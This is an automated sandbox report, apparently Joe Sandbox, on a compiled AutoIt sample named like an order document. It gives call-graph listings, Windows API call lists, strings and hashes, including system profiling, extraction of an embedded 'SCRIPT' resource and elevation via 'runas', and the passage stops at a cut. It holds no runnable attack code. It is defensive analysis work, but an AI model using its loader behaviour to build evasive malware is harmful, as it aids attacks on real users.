100907 98375d PostQuitMessage 100905->100907 100908 983695 100905->100908 100910 9836ed 100906->100910 100911 9bd31c 100906->100911 100915 9836d8 100907->100915 100912 9bd38f 100908->100912 100913 9836a0 100908->100913 100909 9836ca DefWindowProcW 100909->100915 100916 9836f2 100910->100916 100917 983715 SetTimer RegisterWindowMessageW 100910->100917 100953 9911d0 10 API calls Mailbox 100911->100953 100957 9e2a16 71 API calls _memset 100912->100957 100918 9836a8 100913->100918 100919 983767 100913->100919 100923 9836f9 KillTimer 100916->100923 100924 9bd2bf 100916->100924 100917->100915 100920 98373e CreatePopupMenu 100917->100920 100925 9836b3 100918->100925 100926 9bd374 100918->100926 100951 984531 64 API calls _memset 100919->100951 100920->100915 100922 9bd343 100954 9911f3 341 API calls Mailbox 100922->100954 100948 9844cb Shell_NotifyIconW _memset 100923->100948 100930 9bd2f8 MoveWindow 100924->100930 100931 9bd2c4 100924->100931 100934 98374b 100925->100934 100935 9836be 100925->100935 100926->100909 100956 9d817e 59 API calls Mailbox 100926->100956 100927 9bd3a1 100927->100909 100927->100915 100930->100915 100937 9bd2c8 100931->100937 100938 9bd2e7 SetFocus 100931->100938 100933 98370c 100949 983114 DeleteObject DestroyWindow Mailbox 100933->100949 100950 9845df 81 API calls _memset 100934->100950 100935->100909 100955 9844cb Shell_NotifyIconW _memset 100935->100955 100936 98375b 100936->100915 100937->100935 100942 9bd2d1 100937->100942 100938->100915 100952 9911d0 10 API calls Mailbox 100942->100952 100944->100909 100946 9bd368 100947 9843db 68 API calls 100946->100947 100947->100944 100948->100933 100949->100915 100950->100936 100951->100936 100952->100915 100953->100922 100954->100935 100955->100946 100956->100944 100957->100927 100958 981055 100963 982649 100958->100963 100961 9a2f80 __cinit 67 API calls 100962 981064 100961->100962 100964 9877c7 59 API calls 100963->100964 100965 9826b7 100964->100965 100970 983582 100965->100970 100968 982754 100969 98105a 100968->100969 100973 983416 59 API calls 2 library calls 100968->100973 100969->100961 100974 9835b0 100970->100974 100973->100968 100975 9835bd 100974->100975 100976 9835a1 100974->100976 100975->100976 100977 9835c4 RegOpenKeyExW 100975->100977 100976->100968 100977->100976 100978 9835de RegQueryValueExW 100977->100978 100979 983614 RegCloseKey 100978->100979 100980 9835ff 100978->100980 100979->100976 100980->100979 100981 981016 100986 984ad2 100981->100986 100984 9a2f80 __cinit 67 API calls 100985 981025 100984->100985 100987 9a0ff6 Mailbox 59 API calls 100986->100987 100989 984ada 100987->100989 100988 98101b 100988->100984 100989->100988 100993 984a94 100989->100993 100994 984a9d 100993->100994 100996 984aaf 100993->100996 100995 9a2f80 __cinit 67 API calls 100994->100995 100995->100996 100997 984afe 100996->100997 100998 9877c7 59 API calls 100997->100998 100999 984b16 GetVersionExW 100998->100999 101000 987d2c 59 API calls 100999->101000 101001 984b59 101000->101001 101002 987e8c 59 API calls 101001->101002 101007 984b86 101001->101007 101003 984b7a 101002->101003 101004 987886 59 API calls 101003->101004 101004->101007 101005 984bf1 GetCurrentProcess IsWow64Process 101006 984c0a 101005->101006 101009 984c89 GetSystemInfo 101006->101009 101010 984c20 101006->101010 101007->101005 101008 9bdc8d 101007->101008 101011 984c56 101009->101011 101021 984c95 101010->101021 101011->100988 101014 984c7d GetSystemInfo 101016 984c47 101014->101016 101015 984c32 101017 984c95 2 API calls 101015->101017 101016->101011 101019 984c4d FreeLibrary 101016->101019 101018 984c3a GetNativeSystemInfo 101017->101018 101018->101016 101019->101011 101022 984c2e 101021->101022 101023 984c9e LoadLibraryA 101021->101023 101022->101014 101022->101015 101023->101022 101024 984caf GetProcAddress 101023->101024 101024->101022 101025 981066 101030 98f8cf 101025->101030 101027 98106c 101028 9a2f80 __cinit 67 API calls 101027->101028 101029 981076 101028->101029 101031 98f8f0 101030->101031 101063 9a0143 101031->101063 101035 98f937 101036 9877c7 59 API calls 101035->101036 101037 98f941 101036->101037 101038 9877c7 59 API calls 101037->101038 101039 98f94b 101038->101039 101040 9877c7 59 API calls 101039->101040 101041 98f955 101040->101041 101042 9877c7 59 API calls 101041->101042 101043 98f993 101042->101043 101044 9877c7 59 API calls 101043->101044 101045 98fa5e 101044->101045 101073 9960e7 101045->101073 101049 98fa90 101050 9877c7 59 API calls 101049->101050 101051 98fa9a 101050->101051 101101 99ffde 101051->101101 101053 98fae1 101054 98faf1 GetStdHandle 101053->101054 101055 98fb3d 101054->101055 101056 9c49d5 101054->101056 101057 98fb45 OleInitialize 101055->101057 101056->101055 101058 9c49de 101056->101058 101057->101027 101108 9e6dda 64 API calls Mailbox 101058->101108 101060 9c49e5 101109 9e74a9 CreateThread 101060->101109 101062 9c49f1 CloseHandle 101062->101057 101110 9a021c 101063->101110 101066 9a021c 59 API calls 101067 9a0185 101066->101067 101068 9877c7 59 API calls 101067->101068 101069 9a0191 101068->101069 101070 987d2c 59 API calls 101069->101070 101071 98f8f6 101070->101071 101072 9a03a2 6 API calls 101071->101072 101072->101035 101074 9877c7 59 API calls 101073->101074 101075 9960f7 101074->101075 101076 9877c7 59 API calls 101075->101076 101077 9960ff 101076->101077 101117 995bfd 101077->101117 101080 995bfd 59 API calls 101081 99610f 101080->101081 101082 9877c7 59 API calls 101081->101082 101083 99611a 101082->101083 101084 9a0ff6 Mailbox 59 API calls 101083->101084 101085 98fa68 101084->101085 101086 996259 101085->101086 101087 996267 101086->101087 101088 9877c7 59 API calls 101087->101088 101089 996272 101088->101089 101090 9877c7 59 API calls 101089->101090 101091 99627d 101090->101091 101092 9877c7 59 API calls 101091->101092 101093 996288 101092->101093 101094 9877c7 59 API calls 101093->101094 101095 996293 101094->101095 101096 995bfd 59 API calls 101095->101096 101097 99629e 101096->101097 101098 9a0ff6 Mailbox 59 API calls 101097->101098 101099 9962a5 RegisterWindowMessageW 101098->101099 101099->101049 101102 99ffee 101101->101102 101103 9d5cc3 101101->101103 101104 9a0ff6 Mailbox 59 API calls 101102->101104 101120 9e9d71 60 API calls 101103->101120 101107 99fff6 101104->101107 101106 9d5cce 101107->101053 101108->101060 101109->101062 101121 9e748f 65 API calls 101109->101121 101111 9877c7 59 API calls 101110->101111 101112 9a0227 101111->101112 101113 9877c7 59 API calls 101112->101113 101114 9a022f 101113->101114 101115 9877c7 59 API calls 101114->101115 101116 9a017b 101115->101116 101116->101066 101118 9877c7 59 API calls 101117->101118 101119 995c05 101118->101119 101119->101080 101120->101106 101122 98e736 101125 98d260 101122->101125 101124 98e744 101126 98d27d 101125->101126 101155 98d4dd 101125->101155 101127 9c2b0a 101126->101127 101128 9c2abb 101126->101128 101134 98d2a4 101126->101134 101169 9fa6fb 341 API calls __cinit 101127->101169 101130 9c2abe 101128->101130 101131 9c2ad9 101128->101131 101133 9c2aca 101130->101133 101130->101134 101131->101155 101168 9fb1b7 341 API calls 3 library calls 101131->101168 101167 9fad0f 341 API calls 101133->101167 101135 9a2f80 __cinit 67 API calls 101134->101135 101139 98d6ab 101134->101139 101143 9c2c26 101134->101143 101147 988620 69 API calls 101134->101147 101149 98d594 101134->101149 101134->101155 101156 98a000 341 API calls 101134->101156 101157 9881a7 59 API calls 101134->101157 101159 9888a0 68 API calls __cinit 101134->101159 101160 9886a2 68 API calls 101134->101160 101162 98859a 68 API calls 101134->101162 101163 98d0dc 341 API calls 101134->101163 101164 989f3a 59 API calls Mailbox 101134->101164 101165 98d060 89 API calls 101134->101165 101166 98cedd 341 API calls 101134->101166 101170 988bb2 68 API calls 101134->101170 101171 989e9c 60 API calls Mailbox 101134->101171 101172 9d6d03 60 API calls 101134->101172 101135->101134 101138 9c2cdf 101138->101138 101139->101124 101173 9faa66 89 API calls 101143->101173 101144 98d5a3 101144->101124 101147->101134 101161 988bb2 68 API calls 101149->101161 101155->101139 101174 9ea0b5 89 API calls 4 library calls 101155->101174 101156->101134 101157->101134 101159->101134 101160->101134 101161->101144 101162->101134 101163->101134 101164->101134 101165->101134 101166->101134 101167->101139 101168->101155 101169->101134 101170->101134 101171->101134 101172->101134 101173->101155 101174->101138

                      Control-flow Graph

                      APIs
                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00983B7A
                      • IsDebuggerPresent.KERNEL32 ref: 00983B8C
                      • GetFullPathNameW.KERNEL32(00007FFF,?,?,00A462F8,00A462E0,?,?), ref: 00983BFD
                        • Part of subcall function 00987D2C: _memmove.LIBCMT ref: 00987D66
                        • Part of subcall function 00990A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00983C26,00A462F8,?,?,?), ref: 00990ACE
                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00983C81
                      • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00A393F0,00000010), ref: 009BD4BC
                      • SetCurrentDirectoryW.KERNEL32(?,00A462F8,?,?,?), ref: 009BD4F4
                      • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00A35D40,00A462F8,?,?,?), ref: 009BD57A
                      • ShellExecuteW.SHELL32(00000000,?,?), ref: 009BD581
                        • Part of subcall function 00983A58: GetSysColorBrush.USER32(0000000F), ref: 00983A62
                        • Part of subcall function 00983A58: LoadCursorW.USER32(00000000,00007F00), ref: 00983A71
                        • Part of subcall function 00983A58: LoadIconW.USER32(00000063), ref: 00983A88
                        • Part of subcall function 00983A58: LoadIconW.USER32(000000A4), ref: 00983A9A
                        • Part of subcall function 00983A58: LoadIconW.USER32(000000A2), ref: 00983AAC
                        • Part of subcall function 00983A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00983AD2
                        • Part of subcall function 00983A58: RegisterClassExW.USER32(?), ref: 00983B28
                        • Part of subcall function 009839E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00983A15
                        • Part of subcall function 009839E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00983A36
                        • Part of subcall function 009839E7: ShowWindow.USER32(00000000,?,?), ref: 00983A4A
                        • Part of subcall function 009839E7: ShowWindow.USER32(00000000,?,?), ref: 00983A53
                        • Part of subcall function 009843DB: _memset.LIBCMT ref: 00984401
                        • Part of subcall function 009843DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 009844A6
                      Strings
                      • This is a third-party compiled AutoIt script., xrefs: 009BD4B4
                      • runas, xrefs: 009BD575
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                      • String ID: This is a third-party compiled AutoIt script.$runas
                      • API String ID: 529118366-3287110873
                      • Opcode ID: b9224b34bde1d8eb12d4e41308fdf7f2a6f72025faca3609a63f35b64de2379c
                      • Instruction ID: cff5bc9026386e19ae7dc48499b13061e5c3547ff47afa690e3593ad0be9bb82
                      • Opcode Fuzzy Hash: b9224b34bde1d8eb12d4e41308fdf7f2a6f72025faca3609a63f35b64de2379c
                      • Instruction Fuzzy Hash: FE51E678E04248BECF11FBF4DC05EED7B79ABC6700B148165F851A62A1DAB58607CB22

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 996 984afe-984b5e call 9877c7 GetVersionExW call 987d2c 1001 984c69-984c6b 996->1001 1002 984b64 996->1002 1004 9bdb90-9bdb9c 1001->1004 1003 984b67-984b6c 1002->1003 1006 984c70-984c71 1003->1006 1007 984b72 1003->1007 1005 9bdb9d-9bdba1 1004->1005 1008 9bdba3 1005->1008 1009 9bdba4-9bdbb0 1005->1009 1010 984b73-984baa call 987e8c call 987886 1006->1010 1007->1010 1008->1009 1009->1005 1011 9bdbb2-9bdbb7 1009->1011 1019 9bdc8d-9bdc90 1010->1019 1020 984bb0-984bb1 1010->1020 1011->1003 1013 9bdbbd-9bdbc4 1011->1013 1013->1004 1015 9bdbc6 1013->1015 1018 9bdbcb-9bdbce 1015->1018 1021 984bf1-984c08 GetCurrentProcess IsWow64Process 1018->1021 1022 9bdbd4-9bdbf2 1018->1022 1023 9bdca9-9bdcad 1019->1023 1024 9bdc92 1019->1024 1020->1018 1025 984bb7-984bc2 1020->1025 1028 984c0a 1021->1028 1029 984c0d-984c1e 1021->1029 1022->1021 1030 9bdbf8-9bdbfe 1022->1030 1026 9bdc98-9bdca1 1023->1026 1027 9bdcaf-9bdcb8 1023->1027 1031 9bdc95 1024->1031 1032 984bc8-984bca 1025->1032 1033 9bdc13-9bdc19 1025->1033 1026->1023 1027->1031 1036 9bdcba-9bdcbd 1027->1036 1028->1029 1037 984c89-984c93 GetSystemInfo 1029->1037 1038 984c20-984c30 call 984c95 1029->1038 1039 9bdc08-9bdc0e 1030->1039 1040 9bdc00-9bdc03 1030->1040 1031->1026 1041 9bdc2e-9bdc3a 1032->1041 1042 984bd0-984bd3 1032->1042 1034 9bdc1b-9bdc1e 1033->1034 1035 9bdc23-9bdc29 1033->1035 1034->1021 1035->1021 1036->1026 1043 984c56-984c66 1037->1043 1053 984c7d-984c87 GetSystemInfo 1038->1053 1054 984c32-984c3f call 984c95 1038->1054 1039->1021 1040->1021 1044 9bdc3c-9bdc3f 1041->1044 1045 9bdc44-9bdc4a 1041->1045 1047 9bdc5a-9bdc5d 1042->1047 1048 984bd9-984be8 1042->1048 1044->1021 1045->1021 1047->1021 1050 9bdc63-9bdc78 1047->1050 1051 9bdc4f-9bdc55 1048->1051 1052 984bee 1048->1052 1055 9bdc7a-9bdc7d 1050->1055 1056 9bdc82-9bdc88 1050->1056 1051->1021 1052->1021 1057 984c47-984c4b 1053->1057 1061 984c41-984c45 GetNativeSystemInfo 1054->1061 1062 984c76-984c7b 1054->1062 1055->1021 1056->1021 1057->1043 1060 984c4d-984c50 FreeLibrary 1057->1060 1060->1043 1061->1057 1062->1061
                      APIs
                      • GetVersionExW.KERNEL32(?), ref: 00984B2B
                        • Part of subcall function 00987D2C: _memmove.LIBCMT ref: 00987D66
                      • GetCurrentProcess.KERNEL32(?,00A0FAEC,00000000,00000000,?), ref: 00984BF8
                      • IsWow64Process.KERNEL32(00000000), ref: 00984BFF
                      • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00984C45
                      • FreeLibrary.KERNEL32(00000000), ref: 00984C50
                      • GetSystemInfo.KERNEL32(00000000), ref: 00984C81
                      • GetSystemInfo.KERNEL32(00000000), ref: 00984C8D
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                      • String ID:
                      • API String ID: 1986165174-0
                      • Opcode ID: 692e5f096afa2695682a11876de6fca2fa3f0691d94e52108e9e15272f2de5d9
                      • Instruction ID: 3aacd4b137382976820b8b96a63ce5803188570d35ea3108a750bbd2f7bf3f2e
                      • Opcode Fuzzy Hash: 692e5f096afa2695682a11876de6fca2fa3f0691d94e52108e9e15272f2de5d9
                      • Instruction Fuzzy Hash: 1091D63194A7C5DEC731DB7885511EAFFE8AF2A310B484E5ED0CB93B41D224E948C759

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1063 984fe9-985001 CreateStreamOnHGlobal 1064 985021-985026 1063->1064 1065 985003-98501a FindResourceExW 1063->1065 1066 9bdd5c-9bdd6b LoadResource 1065->1066 1067 985020 1065->1067 1066->1067 1068 9bdd71-9bdd7f SizeofResource 1066->1068 1067->1064 1068->1067 1069 9bdd85-9bdd90 LockResource 1068->1069 1069->1067 1070 9bdd96-9bdd9e 1069->1070 1071 9bdda2-9bddb4 1070->1071 1071->1067
                      APIs
                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00984EEE,?,?,00000000,00000000), ref: 00984FF9
                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00984EEE,?,?,00000000,00000000), ref: 00985010
                      • LoadResource.KERNEL32(?,00000000,?,?,00984EEE,?,?,00000000,00000000,?,?,?,?,?,?,00984F8F), ref: 009BDD60
                      • SizeofResource.KERNEL32(?,00000000,?,?,00984EEE,?,?,00000000,00000000,?,?,?,?,?,?,00984F8F), ref: 009BDD75
                      • LockResource.KERNEL32(00984EEE,?,?,00984EEE,?,?,00000000,00000000,?,?,?,?,?,?,00984F8F,00000000), ref: 009BDD88
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                      • String ID: SCRIPT
                      • API String ID: 3051347437-3967369404
                      • Opcode ID: 8f238cfabb102b263871f8ce66ba15489c16a40048178a907566347cf5fe98bf
                      • Instruction ID: 76147bce69217c1bdba0cf3bb6c7e0c3d8172d9cceb2f2634f4ca7d945780bdf
                      • Opcode Fuzzy Hash: 8f238cfabb102b263871f8ce66ba15489c16a40048178a907566347cf5fe98bf
                      • Instruction Fuzzy Hash: 6B119A74200704BFD7319FA5DC48FA77BBDEBC9B51F208168F40AA66A0DB71E806C660
                      APIs
                      • GetFileAttributesW.KERNELBASE(?,009BE7C1), ref: 009E46A6
                      • FindFirstFileW.KERNELBASE(?,?), ref: 009E46B7
                      • FindClose.KERNEL32(00000000), ref: 009E46C7
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: FileFind$AttributesCloseFirst
                      • String ID:
                      • API String ID: 48322524-0
                      • Opcode ID: c1a90edeece6cf32cb3a31ff84dea51086d7b2684db04fe9f36fecd7eacbac3a
                      • Instruction ID: 6de5e0d68350291d0adb712d92f7102987d107efc5a5e01ed5293494578c7ab4
                      • Opcode Fuzzy Hash: c1a90edeece6cf32cb3a31ff84dea51086d7b2684db04fe9f36fecd7eacbac3a
                      • Instruction Fuzzy Hash: 3CE0D8314104045F8220F778EC4D4EA775C9E06335F100715F935D14E0E7B06D518596
                      Strings
                      • Variable must be of type 'Object'., xrefs: 009C428C
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID:
                      • String ID: Variable must be of type 'Object'.
                      • API String ID: 0-109567571
                      • Opcode ID: c2903cd6e19a4494802f9d76874a520c27cb780499df320f48372dca6d6a472b
                      • Instruction ID: ea3ed61051cf48c32777b3efae0837e0bca5639c6ebd044c111767cbbe2354cf
                      • Opcode Fuzzy Hash: c2903cd6e19a4494802f9d76874a520c27cb780499df320f48372dca6d6a472b
                      • Instruction Fuzzy Hash: 8FA29B74E04215CFCB24EF98C4A0AAEB7B5FF89300F248469E916AB351D775ED42CB91
                      APIs
                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00990BBB
                      • timeGetTime.WINMM ref: 00990E76
                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00990FB3
                      • TranslateMessage.USER32(?), ref: 00990FC7
                      • DispatchMessageW.USER32(?), ref: 00990FD5
                      • Sleep.KERNEL32(0000000A), ref: 00990FDF
                      • LockWindowUpdate.USER32(00000000,?,?), ref: 0099105A
                      • DestroyWindow.USER32 ref: 00991066
                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00991080
                      • Sleep.KERNEL32(0000000A,?,?), ref: 009C52AD
                      • TranslateMessage.USER32(?), ref: 009C608A
                      • DispatchMessageW.USER32(?), ref: 009C6098
                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 009C60AC
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                      • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                      • API String ID: 4003667617-3242690629
                      • Opcode ID: 59458950aab7245c596f94488ecf7486b4b09fef91a7cae3fe3f297402626f78
                      • Instruction ID: cebcb2ff1408ff2b43961a5d487a82584cf67db647aeab02c9ce91699dd6ead9
                      • Opcode Fuzzy Hash: 59458950aab7245c596f94488ecf7486b4b09fef91a7cae3fe3f297402626f78
                      • Instruction Fuzzy Hash: B3B2CE70A08741DFDB24DB24C884FAAB7E8BFC5304F14491DE49A972A1DB75E885CB93

                      Control-flow Graph

                      APIs
                        • Part of subcall function 009E91E9: __time64.LIBCMT ref: 009E91F3
                        • Part of subcall function 00985045: _fseek.LIBCMT ref: 0098505D
                      • __wsplitpath.LIBCMT ref: 009E94BE
                        • Part of subcall function 009A432E: __wsplitpath_helper.LIBCMT ref: 009A436E
                      • _wcscpy.LIBCMT ref: 009E94D1
                      • _wcscat.LIBCMT ref: 009E94E4
                      • __wsplitpath.LIBCMT ref: 009E9509
                      • _wcscat.LIBCMT ref: 009E951F
                      • _wcscat.LIBCMT ref: 009E9532
                        • Part of subcall function 009E922F: _memmove.LIBCMT ref: 009E9268
                        • Part of subcall function 009E922F: _memmove.LIBCMT ref: 009E9277
                      • _wcscmp.LIBCMT ref: 009E9479
                        • Part of subcall function 009E99BE: _wcscmp.LIBCMT ref: 009E9AAE
                        • Part of subcall function 009E99BE: _wcscmp.LIBCMT ref: 009E9AC1
                      • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 009E96DC
                      • _wcsncpy.LIBCMT ref: 009E974F
                      • DeleteFileW.KERNEL32(?,?), ref: 009E9785
                      • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 009E979B
                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 009E97AC
                      • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 009E97BE
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                      • String ID:
                      • API String ID: 1500180987-0
                      • Opcode ID: 52a2e83a1c0f56ed3390a2ee33639c1895b35bb5af3900a6e76887b30d175e7e
                      • Instruction ID: 353431f6b638e794fad6c325cb3c8a8a1b4b72f26212f8f09187664ef3ef0e3c
                      • Opcode Fuzzy Hash: 52a2e83a1c0f56ed3390a2ee33639c1895b35bb5af3900a6e76887b30d175e7e
                      • Instruction Fuzzy Hash: 6EC12BB1D00219AEDF21DF95CC85ADEB7BDAF95300F0040AAF609E6251EB709E858F65

                      Control-flow Graph

                      APIs
                      • GetSysColorBrush.USER32(0000000F), ref: 00983074
                      • RegisterClassExW.USER32(00000030), ref: 0098309E
                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 009830AF
                      • InitCommonControlsEx.COMCTL32(?), ref: 009830CC
                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009830DC
                      • LoadIconW.USER32(000000A9), ref: 009830F2
                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00983101
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                      • Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd
                      Similarity
                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                      • API String ID: 2914291525-1005189915
                      • Opcode ID: 32354fc93e70d75bc09fd289525a00b175243626af6f1348ffb99127c8e650a3
                      • Instruction ID: de3c7039f4c66402db4fb713be936c003f2fc11e7b59fc957b93a5ab8cf77517
                      • Opcode Fuzzy Hash: 32354fc93e70d75bc09fd289525a00b175243626af6f1348ffb99127c8e650a3
                      • Instruction Fuzzy Hash: A4312CB9941309EFDB50DFE4D889AC9BBF0FB0A310F10452AE590E62A0E7B60547CF52

                      Control-flow Graph

                      APIs
